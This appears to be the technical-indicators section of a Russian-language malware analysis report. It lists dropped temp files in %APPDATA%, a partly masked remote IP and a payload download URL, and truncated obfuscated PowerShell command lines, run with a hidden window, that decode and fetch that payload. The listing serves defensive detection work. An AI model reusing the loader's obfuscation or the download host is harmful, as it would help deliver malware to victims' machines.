Техническая информация
- %APPDATA%\bita801.tmp
- %APPDATA%\bitfad3.tmp
- %APPDATA%\bita801.tmp
- %APPDATA%\bitfad3.tmp
- %APPDATA%\bita801.tmp в %APPDATA%\ditmargariner.chu
- %APPDATA%\bitfad3.tmp в %APPDATA%\ditmargariner.chu
- '85.##9.176.46':80
- http://85.##9.176.46/Fakturabelbenes.xtp
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "dir;Function Bloodsuck9 ($Beboelseslejlighederne){$Eclipsed234=5;$Eclipsed234++;For($Begrlihed=5; $Begrlihed -lt $Beboelseslejlighederne.Length-1; $Begrlihed+=$Eclipsed234){$Amazonjunglen = '...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "dir;Function Bloodsuck9 ($Beboelseslejlighederne){$Eclipsed234=5;$Eclipsed234++;For($Begrlihed=5; $Begrlihed -lt $Beboelseslejlighederne.Length-1; $Begrlihed+=$Eclipsed234){$Amazonjunglen = '...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "dir;Function Bloodsuck9 ($Beboelseslejlighederne){$Eclipsed234=5;$Eclipsed234++;For($Begrlihed=5; $Begrlihed -lt $Beboelseslejlighederne.Length-1; $Begrlihed+=$Eclipsed234){$Amazonjunglen = '...